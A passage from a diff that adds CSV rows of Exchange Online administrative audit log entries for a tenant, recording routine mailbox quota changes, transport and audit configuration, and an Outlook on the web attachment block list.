+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Microsoft Exchange Migration""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""9 GB (9,663,676,416 bytes)""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Migration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""10 GB (10,737,418,240 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  }
+]"
+2020-04-23T06:08:01Z,,,Install-DataClassificationConfig,"[
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  }
+]"
+2020-04-23T06:09:18Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:09:09Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:09:01Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:08:52Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:08:42Z,,,Set-TransportConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  },
+  {
+    ""Name"": ""OrganizationFederatedMailbox"",
+    ""Value"": ""FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-23T06:08:27Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""UMGrammar"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""MaxSendSize"",
+    ""Value"": ""1 GB (1,073,741,824 bytes)""
+  },
+  {
+    ""Name"": ""MailRouting"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""MessageTracking"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""OMEncryption"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""OABGen"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ClientExtensions"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}""
+  },
+  {
+    ""Name"": ""GMGen"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SuiteServiceStorage"",
+    ""Value"": ""True""
+  }
+]"
+2020-04-23T06:08:11Z,,,Set-OwaMailboxPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\OwaMailboxPolicy-Default""
+  },
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""BlockedFileTypes"",
+    ""Value"": "".settingcontent-ms;.printerexport;.appcontent-ms;.appref-ms;.vsmacros;.website;.msh2xml;.msh1xml;.diagcab;.webpnp;.ps2xml;.ps1xml;.mshxml;.gadget;.theme;.psdm1;.mhtml;.cdxml;.xbap;.vhdx;.pyzw;.pssc;.psd1;.psc2;.psc1;.msh2;.msh1;.jnlp;.aspx;.xnk;.xll;.wsh;.wsf;.wsc;.wsb;.vsw;.vst;.vss;.vhd;.vbs;.vbp;.vbe;.url;.udl;.tmp;.shs;.shb;.sct;.scr;.scf;.reg;.pyz;.pyw;.pyo;.pyc;.pst;.ps2;.ps1;.prg;.prf;.plg;.pif;.pcd;.ops;.msu;.mst;.msp;.msi;.msh;.msc;.mht;.mdz;.mdw;.mdt;.mde;.mdb;.mda;.mcf;.maw;.mav;.mau;.mat;.mas;.mar;.maq;.mam;.mag;.maf;.mad;.lnk;.ksh;.jse;.jar;.its;.isp;.ins;.inf;.htc;.hta;.hpj;.hlp;.grp;.fxp;.exe;.der;.csh;.crt;.cpl;.com;.cnt;.cmd;.chm;.cer;.bat;.bas;.asx;.asp;.app;.adp;.ade;.ws;.vb;.py;.pl;.js;.apk;.appx""
+  }
+]"
+2020-04-23T06:09:19Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:09:10Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:09:08Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:09:00Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:08:52Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:08:50Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:08:38Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""OMEncryptionStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:07:59Z,,,Install-AdminAuditLogConfig,"[
+  {
+    ""Name"": ""DomainController"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-23T06:09:20Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:09:11Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:09:02Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
+    ""Value"": ""99 GB (106,300,440,576 bytes)""
+  },
+  {
+    ""Name"": ""HiddenFromAddressListsEnabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""SCLDeleteEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLQuarantineEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""SCLRejectEnabled"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""UseDatabaseQuotaDefaults"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""RecoverableItemsWarningQuota"",
+    ""Value"": ""20 GB (21,474,836,480 bytes)""
+  },
+  {
+    ""Name"": ""IssueWarningQuota"",
+    ""Value"": ""90 GB (96,636,764,160 bytes)""
+  },
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}""
+  },
+  {
+    ""Name"": ""ProhibitSendReceiveQuota"",
+    ""Value"": ""100 GB (107,374,182,400 bytes)""
+  },
+  {
+    ""Name"": ""SCLJunkEnabled"",
+    ""Value"": ""False""
+  }
+]"
+2020-04-23T06:09:00Z,,,Set-Mailbox,"[
+  {
+    ""Name"": ""RecoverableItemsQuota"",
+    ""Value"": ""30 GB (32,212,254,720 bytes)""
+  },
+  {
+    ""Name"": ""Force"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Arbitration"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""QuarantineMessageStore"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ProhibitSendQuota"",
